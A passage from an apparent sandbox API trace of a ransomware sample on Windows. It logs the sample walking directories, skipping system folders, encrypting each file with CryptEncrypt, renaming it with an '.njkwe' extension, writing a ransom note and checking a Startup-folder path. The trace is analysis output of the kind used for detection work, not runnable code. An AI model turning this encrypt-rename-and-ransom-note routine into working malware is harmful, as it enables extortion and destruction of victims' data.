pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.065] GetProcessHeap () returned 0xbe0000 [0076.065] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.065] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x8c7, lpOverlapped=0x0) returned 1 [0076.067] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff739, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.067] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x8c7, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x8c7, lpOverlapped=0x0) returned 1 [0076.067] GetProcessHeap () returned 0xbe0000 [0076.067] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.067] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.067] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.068] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.068] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.068] CloseHandle (hObject=0x434) returned 1 [0076.068] GetProcessHeap () returned 0xbe0000 [0076.068] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.068] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.068] GetProcessHeap () returned 0xbe0000 [0076.068] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.068] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0f327, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e0f327, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0076.069] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.069] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.069] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.069] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.069] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.069] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml") returned 100 [0076.069] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.069] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.069] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.069] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.069] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.069] GetTickCount () returned 0x11535c2 [0076.070] GetTickCount () returned 0x11535c2 [0076.070] GetTickCount () returned 0x11535c2 [0076.070] GetTickCount () returned 0x11535c2 [0076.070] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.070] GetProcessHeap () returned 0xbe0000 [0076.070] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.070] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.071] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.071] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.071] GetProcessHeap () returned 0xbe0000 [0076.071] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.071] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.071] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.072] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.072] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.072] CloseHandle (hObject=0x434) returned 1 [0076.072] GetProcessHeap () returned 0xbe0000 [0076.072] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.072] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.072] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.073] GetProcessHeap () returned 0xbe0000 [0076.073] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.073] FindNextFileW (in: hFindFile=0xc19ee0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.073] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.073] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.073] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.073] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.073] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.073] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov") returned 85 [0076.073] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.073] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.073] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.073] GetProcessHeap () returned 0xbe0000 [0076.073] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.073] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*") returned 87 [0076.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0076.073] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.073] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.073] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.073] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.073] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.073] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\.") returned 87 [0076.073] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.073] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.073] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.074] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.074] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.074] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.074] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.074] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\..") returned 88 [0076.074] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.074] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.074] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.074] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.074] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.074] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.074] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.074] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.074] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime") returned 93 [0076.074] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.074] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.074] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.074] GetProcessHeap () returned 0xbe0000 [0076.074] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.074] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*") returned 95 [0076.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0076.074] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.074] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.074] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.074] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.074] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.074] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\.") returned 95 [0076.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.074] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1854d2, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1854d2, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1854d2, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.074] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.074] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.074] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.075] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.075] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.075] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\..") returned 96 [0076.075] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.075] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.075] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53de90cb, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53de90cb, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0076.075] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0076.075] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0076.075] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0076.075] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0076.075] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0076.075] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0076.075] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0076.075] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.075] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0076.075] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.075] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.075] GetTickCount () returned 0x11535c2 [0076.075] GetTickCount () returned 0x11535c2 [0076.075] GetTickCount () returned 0x11535c2 [0076.075] GetTickCount () returned 0x11535c2 [0076.075] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.076] GetProcessHeap () returned 0xbe0000 [0076.076] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.076] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x670, lpOverlapped=0x0) returned 1 [0076.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff990, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x670, lpOverlapped=0x0) returned 1 [0076.082] GetProcessHeap () returned 0xbe0000 [0076.082] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.082] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.082] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.083] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.083] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.083] CloseHandle (hObject=0x43c) returned 1 [0076.083] GetProcessHeap () returned 0xbe0000 [0076.083] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.083] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0076.083] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.084] GetProcessHeap () returned 0xbe0000 [0076.084] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.084] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53de90cb, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53de90cb, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0076.084] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0076.084] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{99b095d8-5959-4820-bea7-7448c8427b4e}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.085] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.085] CloseHandle (hObject=0x438) returned 1 [0076.086] GetProcessHeap () returned 0xbe0000 [0076.086] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.086] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0f327, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53e0f327, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53e0f327, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, 